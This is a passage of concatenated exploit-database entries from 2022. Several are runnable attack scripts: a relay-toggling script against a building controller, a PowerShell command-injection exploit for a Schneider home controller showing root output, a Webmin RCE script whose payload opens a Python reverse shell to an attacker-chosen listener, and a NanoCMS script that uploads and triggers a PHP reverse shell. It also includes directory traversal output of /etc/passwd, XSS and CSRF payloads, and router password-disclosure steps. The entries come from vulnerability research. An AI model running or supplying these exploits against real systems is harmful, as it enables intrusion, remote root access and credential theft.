urlRelay1Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=0&time=0&pwd=0&"
urlRelay2On = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=1&time=0&pwd=0&"
urlRelay2Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=0&time=0&pwd=0&"
headers = {
"Host": ""+host+"",
"User-Agent": "9lyph/3.0",
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"DNT": "1",
"Connection": "close",
"Referer": "http://"+host+"/relay_cgi.html",
"Cookie": "session=4463009"
}
print (Fore.YELLOW + f"[+] Exploiting" + Style.RESET_ALL, flush=True, end=" ")
for i in range(5):
time.sleep (1)
print (Fore.YELLOW + "." + Style.RESET_ALL, flush=True, end="")
try:
if (relay == "1"):
print (Fore.GREEN + "\n[+] Relay 1 switched on !" + Style.RESET_ALL)
r = requests.get(urlRelay1On)
time.sleep (5)
print (Fore.GREEN + "[+] Relay 1 switched off !" + Style.RESET_ALL)
r = requests.get(urlRelay1Off)
print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="")
elif (relay == "2"):
print (Fore.GREEN + "[+] Relay 2 switched on !" + Style.RESET_ALL)
r = requests.get(urlRelay2On)
time.sleep (5)
print (Fore.GREEN + "[+] Relay 2 switched on !" + Style.RESET_ALL)
r = requests.get(urlRelay2Off)
print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="")
else:
print (Fore.RED + "[!] No such relay" + Style.RESET_ALL)
except KeyboardInterrupt:
sys.exit(1)
except requests.exceptions.Timeout:
print ("[!] Connection to host timed out !")
sys.exit(1)
except requests.exceptions.Timeout:
print ("[!] Connection to host timed out !")
sys.exit(1)
except Exception as e:
print (Fore.RED + f"[+] You came up short I\'m afraid !" + Style.RESET_ALL)
if __name__ == "__main__":
if len(sys.argv)>2:
host = sys.argv[1]
relay = sys.argv[2]
main ()
else:
print (Fore.RED + f"[+] Not enough arguments, please specify target and relay!" + Style.RESET_ALL)
# Exploit Title: Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Directory Traversal
# Exploit Author: LiquidWorm
Vendor: CAREL INDUSTRIES S.p.A.
Product web page: https://www.carel.com
Affected version: Firmware: A2.1.0 - B2.1.0
Application Software: 2.15.4A
Software version: v16 13020200
Summary: pCO sistema is the solution CAREL offers its customers for managing HVAC/R
applications and systems. It consists of programmable controllers, user interfaces,
gateways and communication interfaces, remote management systems to offer the OEMs
working in HVAC/R a control system that is powerful yet flexible, can be easily interfaced
to the more widely-used Building Management Systems, and can also be integrated into
proprietary supervisory systems.
Desc: The device suffers from an unauthenticated arbitrary file disclosure vulnerability.
Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script
is not properly verified before being used to download log files. This can be exploited
to disclose the contents of arbitrary and sensitive files via directory traversal attacks.
=======================================================================================
/usr/local/www/usr-cgi/logdownload.cgi:
---------------------------------------
01: #!/bin/bash
02:
03: if [ "$REQUEST_METHOD" = "POST" ]; then
04: read QUERY_STRING
05: REQUEST_METHOD=GET
06: export REQUEST_METHOD
07: export QUERY_STRING
08: fi
09:
10: LOGDIR="/usr/local/root/flash/http/log"
11:
12: tmp=${QUERY_STRING%"$"*}
13: cmd=${tmp%"="*}
14: if [ "$cmd" = "dir" ]; then
15: PATHCURRENT=$LOGDIR/${tmp#*"="}
16: else
17: PATHCURRENT=$LOGDIR
18: fi
19:
20: tmp=${QUERY_STRING#*"$"}
21: cmd=${tmp%"="*}
22: if [ "$cmd" = "file" ]; then
23: FILECURRENT=${tmp#*"="}
24: else
25: if [ -f $PATHCURRENT/lastlog.csv.gz ]; then
26: FILECURRENT=lastlog.csv.gz
27: else
28: FILECURRENT=lastlog.csv
29: fi
30: fi
31:
32: if [ ! -f $PATHCURRENT/$FILECURRENT ]; then
33: echo -ne "Content-type: text/html\r\nCache-Control: no-cache\r\nExpires: -1\r\n\r\n"
34: cat carel.inc.html
35: echo "<center>File not available!</center>"
36: cat carel.bottom.html
37: exit
38: fi
39:
40: if [ -z $(echo $FILECURRENT | grep -i gz ) ]; then
41: if [ -z $(echo $FILECURRENT | grep -i bmp ) ]; then
42: if [ -z $(echo $FILECURRENT | grep -i svg ) ]; then
43: echo -ne "Content-Type: text/csv\r\n"
44: else
45: echo -ne "Content-Type: image/svg+xml\r\n"
46: fi
47: else
48: echo -ne "Content-Type: image/bmp\r\n"
49: fi
50: else
51: echo -ne "Content-Type: application/x-gzip\r\n"
52: fi
53: echo -ne "Content-Disposition: attachment; filename=$FILECURRENT\r\n\r\n"
54:
55: cat $PATHCURRENT/$FILECURRENT
=======================================================================================
Tested on: GNU/Linux 4.11.12 (armv7l)
thttpd/2.29
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5709
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5709.php
10.05.2022
--
$ curl -s http://10.0.0.3/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/false
www-data:x:33:33:www-data:/var/www:/bin/false
operator:x:37:37:Operator:/var:/bin/false
nobody:x:65534:65534:nobody:/home:/bin/false
guest:x:502:101::/home/guest:/bin/bash
carel:x:500:500:Carel:/home/carel:/bin/bash
http:x:48:48:HTTP users:/usr/local/www/http:/bin/false
httpadmin:x:200:200:httpadmin:/usr/local/www/http:/bin/bash
sshd:x:1000:1001:SSH drop priv user:/:/bin/false
# Exploit Title: Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution
# Exploit Author: LiquidWorm
<#SpaceLogic.ps1
Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) Remote Root Exploit
Vendor: Schneider Electric SE
Product web page: https://www.se.com
https://www.se.com/ww/en/product/5200WHC2/home-controller-spacelogic-cbus-cbus-ip-free-standing-24v-dc/
https://www.se.com/ww/en/product-range/2216-spacelogic-cbus-home-automation-system/?parent-subcategory-id=88010&filter=business-5-residential-and-small-business#software-and-firmware
Affected version: SpaceLogic C-Bus Home Controller (5200WHC2)
formerly known as C-Bus Wiser Home Controller MK2
V1.31.460 and prior
Firmware: 604
Summary: SpaceLogic C-Bus Home Automation System
Lighting control and automation solutions for
buildings of the future, part of SpaceLogic.
SpaceLogic C-Bus is a powerful, fully integrated
system that can control and automate lighting
and many other electrical systems and products.
The SpaceLogic C-Bus system is robust, flexible,
scalable and has proven solutions for buildings
of the future. Implemented for commercial and
residential buildings automation, it brings
control, comfort, efficiency and ease of use
to its occupants.
Wiser Home Control makes technologies in your
home easy by providing seamless control of music,
home theatre, lighting, air conditioning, sprinkler
systems, curtains and shutters, security systems...
you name it. Usable anytime, anywhere even when
you are away, via preset shortcuts or direct
control, in the same look and feel from a wall
switch, a home computer, or even your smartphone
or TV - there is no wiser way to enjoy 24/7
connectivity, comfort and convenience, entertainment
and peace of mind homewide!
The Wiser 2 Home Controller allows you to access
your C-Bus using a graphical user interface, sometimes
referred to as the Wiser 2 UI. The Wiser 2 Home
Controller arrives with a sample project loaded
and the user interface accessible from your local
home network. With certain options set, you can
also access the Wiser 2 UI from anywhere using
the Internet. Using the Wiser 2 Home Controller
you can: control equipment such as IP cameras,
C-Bus devices and non C-Bus wired and wireless
equipment on the home LAN, schedule events in
the home, create and store scenes on-board, customise
a C-Bus system using the on-board Logic Engine,
monitor the home environment including C-Bus and
security systems, control ZigBee products such
as Ulti-ZigBee Dimmer, Relay, Groups and Curtains.
Examples of equipment you might access with Wiser
2 Home Controller include lighting, HVAC, curtains,
cameras, sprinkler systems, power monitoring, Ulti-ZigBee,
multi-room audio and security controls.
Desc: The home automation solution suffers from
an authenticated OS command injection vulnerability.
This can be exploited to inject and execute arbitrary
shell commands as the root user via the 'name' GET
parameter in 'delsnap.pl' Perl/CGI script which is
used for deleting snapshots taken from the webcam.
=========================================================
/www/delsnap.pl:
----------------
01: #!/usr/bin/perl
02: use IO::Handle;
03:
04:
05: select(STDERR);
06: $| = 1;
07: select(STDOUT);
08: $| = 1;
09:
10: #print "\r\n\r\n";
11:
12: $CGITempFile::TMPDIRECTORY = '/mnt/microsd/clipsal/ugen/imgs/';
13: use CGI;
14:
15: my $PROGNAME = "delsnap.pl";
16:
17: my $cgi = new CGI();
18:
19: my $name = $cgi->param('name');
20: if ($name eq "list") {
21: print "\r\n\r\n";
22: print "DATA=";
23: print `ls -C1 /mnt/microsd/clipsal/ugen/imgs/`;
24: exit(0);
25: }
26: if ($name eq "deleteall") {
27: print "\r\n\r\n";
28: print "DELETINGALL=TRUE&";
29: print `rm /mnt/microsd/clipsal/ugen/imgs/*`;
30: print "COMPLETED=true\n";
31: exit(0);
32: }
33: #print "name $name\n";
34: print "\r\n\r\n";
35: my $filename = "/mnt/microsd/clipsal/ugen/imgs/$name";
36:
37: unlink $filename or die "COMPLETED=false\n";
38:
39: print "COMPLETED=true\n";
=========================================================
Tested on: Machine: OMAP3 Wiser2 Board
CPU: ARMv7 revision 2
GNU/Linux 2.6.37 (armv7l)
BusyBox v1.22.1
thttpd/2.25b
Perl v5.20.0
Clipsal 81
Angstrom 2009.X-stable
PICED 4.14.0.100
lighttpd/1.7
GCC 4.4.3
NodeJS v10.15.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5710
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5710.php
Vendor advisory: https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf
CVE ID: CVE-2022-34753
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34753
27.03.2022
#>
$host.UI.RawUI.ForegroundColor = "Green"
if ($($args.Count) -ne 2) {
Write-Host("`nUsage: .\SpaceLogic.ps1 [IP] [CMD]`n")
} else {
$ip = $args[0]
$cmd = $args[1]
$cmdinj = "/delsnap.pl?name=|$cmd"
Write-Host("`nSending command '$cmd' to $ip`n")
#curl -Headers @{Authorization = "Basic XXXX"} -v $ip$cmdinj
curl -v $ip$cmdinj
}
<#PoC
PS C:\> .\SpaceLogic.ps1
Usage: .\SpaceLogic.ps1 [IP] [CMD]
PS C:\> .\SpaceLogic.ps1 192.168.1.2 "uname -a;id;pwd"
Sending command 'uname -a;id;pwd' to 192.168.1.2
VERBOSE: GET http://192.168.1.2/delsnap.pl?name=|uname -a;id;pwd with 0-byte payload
VERBOSE: received 129-byte response of content type text/html; charset=utf-8
StatusCode : 200
StatusDescription : OK
Content : Linux localhost 2.6.37-g4be9a2f-dirty #111 Wed May 21 20:39:38 MYT 2014 armv7l GNU/Linux
uid=0(root) gid=0(root)
/custom-package
RawContent : HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Connection: keep-alive
Content-Length: 129
Content-Type: text/html; charset=utf-8
Date: Thu, 30 Jun 2022 14:48:43 GMT
ETag: W/"81-LTIWJvYlDBYAlgXEy...
Forms : {}
Headers : {[Access-Control-Allow-Origin, *], [Connection, keep-alive], [Content-Length, 129], [Content-Type, text/html;
charset=utf-8]...}
Images : {}
InputFields : {}
Links : {}
ParsedHtml : mshtml.HTMLDocumentClass
RawContentLength : 129
PS C:\>
#>
# Exploit Title: WordPress Plugin WP-UserOnline 2.87.6 - Stored Cross-Site Scripting (XSS)
# Date: 21/07/2022
# Exploit Author: Steffin Stanly
# Vendor Homepage: https://github.com/lesterchan/wp-useronline
# Software Link: https://wordpress.org/plugins/wp-useronline/
# Version: <=2.87.6
# Tested on Windows
How to reproduce vulnerability:
1. Install WordPress 6.0.1
2. Install and activate WP-UserOnline plugin.
3. Navigate to Setting >> WP-UserOnline and enter the data into the User(s) Browsing Site.
4. Add the following payload "><script>alert(1)</script> and save changes
5. On visiting the dashboard, You will observe that the payload successfully got stored in the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.
# Exploit Title: Wavlink WN533A8 - Cross-Site Scripting (XSS)
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: M33A8.V5030.190716
# Vendor home page : wavlink.com
# Authentication Required: No
# CVE : CVE-2022-34048
# Tested on: Windows
# Poc code
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://IP_ADDRESS/cgi-bin/login.cgi" method="POST">
<input type="hidden" name="newUI" value="1" />
<input type="hidden" name="page" value="login" />
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="langChange" value="0" />
<input type="hidden" name="ipaddr" value="196.219.234.10" />
<input type="hidden" name="login_page" value="x");alert(9);x=("" />
<input type="hidden" name="homepage" value="main.shtml" />
<input type="hidden" name="sysinitpage" value="sysinit.shtml" />
<input type="hidden" name="wizardpage" value="wiz.shtml" />
<input type="hidden" name="hostname" value="59.148.80.138" />
<input type="hidden" name="key" value="M94947765" />
<input type="hidden" name="password" value="ab4e98e4640b6c1ee88574ec0f13f908" />
<input type="hidden" name="lang_select" value="en" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: Wavlink WN533A8 - Password Disclosure
# Date: 2022-06-12
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: M33A8.V5030.190716
# Vendor home page : wavlink.com
# Authentication Required: No
# CVE : CVE-2022-34046
# Tested on: Windows
# Exploit
view-source:http://IP_ADDRESS/sysinit.shtml
search for var syspasswd="
you will find the username and the password
# Exploit Title: WordPress Plugin Duplicator 1.4.7 - Information Disclosure
# Google Dork: N/A
# Date: 07.27.2022
# Exploit Author: SecuriTrust
# Vendor Homepage: https://snapcreek.com/
# Software Link: https://wordpress.org/plugins/duplicator/
# Version: <= 1.4.7
# Tested on: Linux, Windows
# CVE : CVE-2022-2552
# Reference: https://securitrust.fr
# Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2552
#Product:
WordPress Plugin Duplicator <= 1.4.7
#Vulnerability:
1-Some system information may be disclosure.
#Proof-Of-Concept:
1-System information.
Some system information is obtained using the "view" parameter.
http://[PATH]/backups-dup-lite/dup-installer/main.installer.php
# Exploit Title: WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download
# Google Dork: N/A
# Date: 07.27.2022
# Exploit Author: SecuriTrust
# Vendor Homepage: https://snapcreek.com/
# Software Link: https://wordpress.org/plugins/duplicator/
# Version: < 1.4.7
# Tested on: Linux, Windows
# CVE : CVE-2022-2551
# Reference: https://securitrust.fr
# Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2551
#Product:
WordPress Plugin Duplicator < 1.4.7
#Vulnerability:
1-It allows an attacker to download the backup file.
#Proof-Of-Concept:
1-Backup download.
The backup file can be downloaded using the "is_daws" parameter.
http://[PATH]/backups-dup-lite/dup-installer/main.installer.php
# Exploit Title: Wavlink WN530HG4 - Password Disclosure
# Date: 2022-06-12
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: M30HG4.V5030.191116
# Vendor home page : wavlink.com
# Authentication Required: No
# CVE : CVE-2022-34047
# Tested on: Windows
# Exploit
view-source:http://IP_address/set_safety.shtml?r=52300
search for var syspasswd="
you will find the username and the password
# Exploit Title: CuteEditor for PHP 6.6 - Directory Traversal
# Google Dork: N/A
# Date: November 17th, 2021
# Exploit Author: Stefan Hesselman
# Vendor Homepage: http://phphtmledit.com/
# Software Link: http://phphtmledit.com/download/phphtmledit.zip
# Version: 6.6
# Tested on: Windows Server 2019
# CVE : N/A
There is a path traversal vulnerability in the browse template feature in CuteEditor for PHP via the "rename file" option. An attacker with access to CuteEditor functions can write HTML templates to any directory inside the web root.
File: /phphtmledit/cuteeditor_files/Dialogs/Include_Security.php, Lines: 109-121
Vulnerable code:
[SNIP]
function ServerMapPath($input_path,$absolute_path,$virtual_path)
{
if($absolute_path!="")
{
return $absolute_path.str_ireplace($virtual_path,"",$input_path);
}
else
{
if(strtoupper(substr(PHP_OS, 0, 3) === 'WIN'))
{
if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['SCRIPT_FILENAME'])) {
$_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr($_SERVER['SCRIPT_FILENAME'], 0, 0 - strlen($_SERVER['PHP_SELF'])));
}
if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['PATH_TRANSLATED'])) {
$_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr(str_replace('\\\\', '\\', $_SERVER['PATH_TRANSLATED']), 0, 0 - strlen($_SERVER['PHP_SELF'])));
}
return $_SERVER["DOCUMENT_ROOT"].$input_path;
}
else
{
return ucfirst($_SERVER["DOCUMENT_ROOT"]).$input_path;
}
}
}
[SNIP]
ServerMapPath() takes 3 arguments: $input_path, $absolute_path, and $virtual_path and is used, among others, in the browse_template.php file.
File:/phphtmledit/cuteeditor_files/Dialogs/browse_Template.php, Lines: 47-56
Vulnerable function (renamefile, line 57):
[SNIP]
switch ($action)
{
[SNIP]
case "renamefile":
rename(ServerMapPath($_GET["filename"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath),ServerMapPath($_GET["newname"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath));
print "<script language=\"javascript\">parent.row_click('".$_GET["newname"]."');</script>";
break;
[SNIP]
$input_path is $_GET["filename"] and is under control of the attacker. If an attacker uploads and renames the HTML template to '..\..\..\poc.html', it becomes:
C:\Inetpub\wwwroot\..\..\..\poc.html
Final result: writes poc.html to the webroot.
STEPS:
1. Create a poc.html file (XSS PoC will do).
<HTML>
<title>Path Traversal PoC</title>
<BODY>
<h1>PoC</h1>
<script>alert('directory traversal');</script>
</BODY>
</HTML>
2. Upload poc.html via the "Insert Templates" page using the "Upload files" option.
3. Select poc.html and select "Rename File".
4. Click on the pencil icon to the right of the poc.html file.
5. Rename file to "..\..\..\poc.html".
6. Press OK. poc.html is written three directories up.
This may require more or less dot dot slash (..\ or ../) depending on the size of your directory tree. Adjust slashes as needed.
# Exploit Title: mPDF 7.0 - Local File Inclusion
# Google Dork: N/A
# Date: 2022-07-23
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://mpdf.github.io/
# Software Link: https://mpdf.github.io/
# Version: CuteNews
# Tested on: Ubuntu 20.04, mPDF 7.0.x
# CVE: N/A
#!/usr/bin/env python3
from urllib.parse import quote
from cmd import Cmd
from base64 import b64encode
class Terminal(Cmd):
prompt = "\nFile >> "
def default(self, args):
payload_gen(args)
def banner():
banner = """ _____ _____ ______ ______ ___ __ __ _ _ _
| __ \| __ \| ____| |____ / _ \ \ \ / / | | (_) |
_ __ ___ | |__) | | | | |__ / / | | | \ V / _____ ___ __ | | ___ _| |_
| '_ ` _ \| ___/| | | | __| / /| | | | > < / _ \ \/ / '_ \| |/ _ \| | __|
| | | | | | | | |__| | | / / | |_| | / . \ | __/> <| |_) | | (_) | | |_
|_| |_| |_|_| |_____/|_| /_/ (_)___(_)_/ \_\ \___/_/\_\ .__/|_|\___/|_|\__|
| |
|_| """
print(banner)
def payload_gen(fname):
payload = f'<annotation file="{fname}" content="{fname}" icon="Graph" title="Attached File: {fname}" pos-x="195" />'
encoded_payload = quote(payload)
print("[+] Replace the content with the payload below")
print(f"Url encoded payload:\n{encoded_payload}\n")
base64enc = b64encode(encoded_payload.encode())
print(f"Base64 encoded payload:\n{base64enc.decode()}\n")
if __name__ == ("__main__"):
banner()
print("Enter Filename eg. /etc/passwd")
terminal= Terminal()
terminal.cmdloop()
# Exploit Title: Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-07-25
# Exploit Author: Emir Polat
# Technical analysis: https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165
# Vendor Homepage: https://www.webmin.com/
# Software Link: https://www.webmin.com/download.html
# Version: < 1.997
# Tested On: Version 1.996 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)
# CVE: CVE-2022-36446
import argparse
import requests
from bs4 import BeautifulSoup
def login(args):
global session
global sysUser
session = requests.Session()
loginUrl = f"{args.target}:10000/session_login.cgi"
infoUrl = f"{args.target}:10000/sysinfo.cgi"
username = args.username
password = args.password
data = {'user': username, 'pass': password}
login = session.post(loginUrl, verify=False, data=data, cookies={'testing': '1'})
sysInfo = session.post(infoUrl, verify=False, cookies={'sid' : session.cookies['sid']})
bs = BeautifulSoup(sysInfo.text, 'html.parser')
sysUser = [item["data-user"] for item in bs.find_all() if "data-user" in item.attrs]
if sysUser:
return True
else:
return False
def exploit(args):
payload = f"""
1337;$(python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{args.listenip}",{args.listenport}));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")');
"""
updateUrl = f"{args.target}:10000/package-updates"
exploitUrl = f"{args.target}:10000/package-updates/update.cgi"
exploitData = {'mode' : 'new', 'search' : 'ssh', 'redir' : '', 'redirdesc' : '', 'u' : payload, 'confirm' : 'Install+Now'}
if login(args):
print("[+] Successfully Logged In !")
print(f"[+] Session Cookie => sid={session.cookies['sid']}")
print(f"[+] User Found => {sysUser[0]}")
res = session.get(updateUrl)
bs = BeautifulSoup(res.text, 'html.parser')
updateAccess = [item["data-module"] for item in bs.find_all() if "data-module" in item.attrs]
if updateAccess[0] == "package-updates":
print(f"[+] User '{sysUser[0]}' has permission to access <<Software Package Updates>>")
print(f"[+] Exploit starting ... ")
print(f"[+] Shell will spawn to {args.listenip} via port {args.listenport}")
session.headers.update({'Referer' : f'{args.target}:10000/package-updates/update.cgi?xnavigation=1'})
session.post(exploitUrl, data=exploitData)
else:
print(f"[-] User '{sysUser[0]}' unfortunately hasn't permission to access <<Software Package Updates>>")
else:
print("[-] Login Failed !")
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Webmin < 1.997 - Remote Code Execution (Authenticated)")
parser.add_argument('-t', '--target', help='Target URL, Ex: https://webmin.localhost', required=True)
parser.add_argument('-u', '--username', help='Username For Login', required=True)
parser.add_argument('-p', '--password', help='Password For Login', required=True)
parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True)
parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True)
parser.add_argument("-s", '--ssl', help="Use if server support SSL.", required=False)
args = parser.parse_args()
exploit(args)
# Exploit Title: NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-07-26
# Exploit Auuthor: p1ckzi
# Vendor Homepage: https://github.com/kalyan02/NanoCMS
# Version: NanoCMS v0.4
# Tested on: Linux Mint 20.3
# CVE: N/A
#
# Description:
# this script uploads a php reverse shell to the target.
# NanoCMS does not sanitise the data of an authenticated user while creating
# webpages. pages are saved with .php extensions by default, allowing an
# authenticated attacker access to the underlying system:
# https://github.com/ishell/Exploits-Archives/blob/master/2009-exploits/0904-exploits/nanocms-multi.txt
#!/usr/bin/env python3
import argparse
import bs4
import errno
import re
import requests
import secrets
import sys
def arguments():
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=f"{sys.argv[0]} exploits authenticated file upload"
"\nand remote code execution in NanoCMS v0.4",
epilog=f"examples:"
f"\n\tpython3 {sys.argv[0]} http://10.10.10.10/ rev.php"
f"\n\tpython3 {sys.argv[0]} http://hostname:8080 rev-shell.php -a"
f"\n\t./{sys.argv[0]} https://10.10.10.10 rev-shell -n -e -u 'user'"
)
parser.add_argument(
"address", help="schema/ip/hostname, port, sub-directories"
" to the vulnerable NanoCMS server"
)
parser.add_argument(
"file", help="php file to upload"
)
parser.add_argument(
"-u", "--user", help="username", default="admin"
)
parser.add_argument(
"-p", "--passwd", help="password", default="demo"
)
parser.add_argument(
"-e", "--execute", help="attempts to make a request to the uploaded"
" file (more useful if uploading a reverse shell)",
action="store_true", default=False
)
parser.add_argument(
"-a", "--accessible", help="turns off features"
" which may negatively affect screen readers",
action="store_true", default=False
)
parser.add_argument(
"-n", "--no-colour", help="removes colour output",
action="store_true", default=False
)
arguments.option = parser.parse_args()
# settings for terminal output defined by user in term_settings().
class settings():
# colours.
c0 = ""
c1 = ""
c2 = ""
# information boxes.
i1 = ""
i2 = ""
i3 = ""
i4 = ""
# checks for terminal setting flags supplied by arguments().
def term_settings():
if arguments.option.accessible:
small_banner()
elif arguments.option.no_colour:
settings.i1 = "[+] "
settings.i2 = "[!] "
settings.i3 = "[i] "
settings.i4 = "$ "
banner()
elif not arguments.option.accessible or arguments.option.no_colour:
settings.c0 = "\u001b[0m" # reset.
settings.c1 = "\u001b[38;5;1m" # red.
settings.c2 = "\u001b[38;5;2m" # green.
settings.i1 = "[+] "
settings.i2 = "[!] "
settings.i3 = "[i] "
settings.i4 = "$ "
banner()
else:
print("something went horribly wrong!")
sys.exit()
# default terminal banner (looks prettier when run lol)
def banner():
print(
"\n .__ .__"
" .__ "
"\n ____ _____ ____ ____ ____ _____ _____| |__ ____ | "
"| | | "
"\n / \\__ \\ / \\ / _ \\_/ ___\\ / \\ / ___/ | \\_/ "
"__ \\| | | | "
"\n| | \\/ __ \\| | ( <_> ) \\___| Y Y \\___ \\| Y \\ _"
"__/| |_| |__"
"\n|___| (____ /___| /\\____/ \\___ >__|_| /____ >___| /\\___ "
">____/____/"
"\n \\/ \\/ \\/ \\/ \\/ \\/ \\/ "
" \\/"
)
def small_banner():
print(
f"{sys.argv[0]}"
"\nNanoCMS authenticated file upload and rce..."
)
# appends a '/' if not supplied at the end of the address.
def address_check(address):
check = re.search('/$', address)
if check is not None:
print('')
else:
arguments.option.address += "/"
# creates a new filename for each upload.
# errors occur if the filename is the same as a previously uploaded one.
def random_filename():
random_filename.name = secrets.token_hex(4)
# note: after a successful login, credentials are saved, so further reuse
# of the script will most likely not require correct credentials.
def login(address, user, passwd):
post_header = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) "
"Gecko/20100101 Firefox/91.0",
"Accept": "text/html,application/xhtml+xml,"
"application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Content-Length": "",
"Connection": "close",
"Referer": f"{arguments.option.address}data/nanoadmin.php",
"Cookie": "PHPSESSID=46ppbqohiobpvvu6olm51ejlq5",
"Upgrade-Insecure-Requests": "1",
}
post_data = {
"user": f"{user}",
"pass": f"{passwd}"
}
url_request = requests.post(
address + 'data/nanoadmin.php?',
headers=post_header,
data=post_data,
verify=False,
timeout=30
)
signin_error = url_request.text
if 'Error : wrong Username or Password' in signin_error:
print(
f"{settings.c1}{settings.i2}could "
f"sign in with {arguments.option.user}/"
f"{arguments.option.passwd}.{settings.c0}"
)
sys.exit(1)
else:
print(
f"{settings.c2}{settings.i1}logged in successfully."
f"{settings.c0}"
)
def exploit(address, file, name):
with open(arguments.option.file, 'r') as file:
file_contents = file.read().rstrip()
post_header = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) "
"Gecko/20100101 Firefox/91.0",
"Accept": "text/html,application/xhtml+xml,"
"application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Content-Length": "",
"Connection": "close",
"Referer": f"{arguments.option.address}data/nanoadmin.php?action="
"addpage",
"Cookie": "PHPSESSID=46ppbqohiobpvvu6olm51ejlq5",
"Upgrade-Insecure-Requests": "1",
}
post_data = {
"title": f"{random_filename.name}",
"save": "Add Page",
"check_sidebar": "sidebar",
"content": f"{file_contents}"
}
url_request = requests.post(
address + 'data/nanoadmin.php?action=addpage',
headers=post_header,
data=post_data,
verify=False,
timeout=30
)
if url_request.status_code == 404:
print(
f"{settings.c1}{settings.i2}{arguments.option.address} could "
f"not be uploaded.{settings.c0}"
)
sys.exit(1)
else:
print(
f"{settings.c2}{settings.i1}file posted."
f"{settings.c0}"
)
print(
f"{settings.i3}if successful, file location should be at:"
f"\n{address}data/pages/{random_filename.name}.php"
)
def execute(address, file, name):
print(
f"{settings.i3}making web request to uploaded file."
)
print(
f"{settings.i3}check listener if reverse shell uploaded."
)
url_request = requests.get(
address + f'data/pages/{random_filename.name}.php',
verify=False
)
if url_request.status_code == 404:
print(
f"{settings.c1}{settings.i2}{arguments.option.file} could "
f"not be found."
f"\n{settings.i2}antivirus may be blocking your upload."
f"{settings.c0}"
)
else:
sys.exit()
def main():
try:
arguments()
term_settings()
address_check(arguments.option.address)
random_filename()
if arguments.option.execute:
login(
arguments.option.address,
arguments.option.user,
arguments.option.passwd
)
exploit(
arguments.option.address,
arguments.option.file,
random_filename.name,
)
execute(
arguments.option.address,
arguments.option.file,
random_filename.name,
)
else:
login(
arguments.option.address,
arguments.option.user,
arguments.option.passwd
)
exploit(
arguments.option.address,
arguments.option.file,
random_filename.name,
)
except KeyboardInterrupt:
print(f"\n{settings.i3}quitting.")
sys.exit()
except requests.exceptions.Timeout:
print(
f"{settings.c1}{settings.i2}the request timed out "
f"while attempting to connect.{settings.c0}"
)
sys.exit()
except requests.ConnectionError:
print(
f"{settings.c1}{settings.i2}could not connect "
f"to {arguments.option.address}{settings.c0}"
)
sys.exit()
except FileNotFoundError:
print(
f"{settings.c1}{settings.i2}{arguments.option.file} "
f"could not be found.{settings.c0}"
)
except (
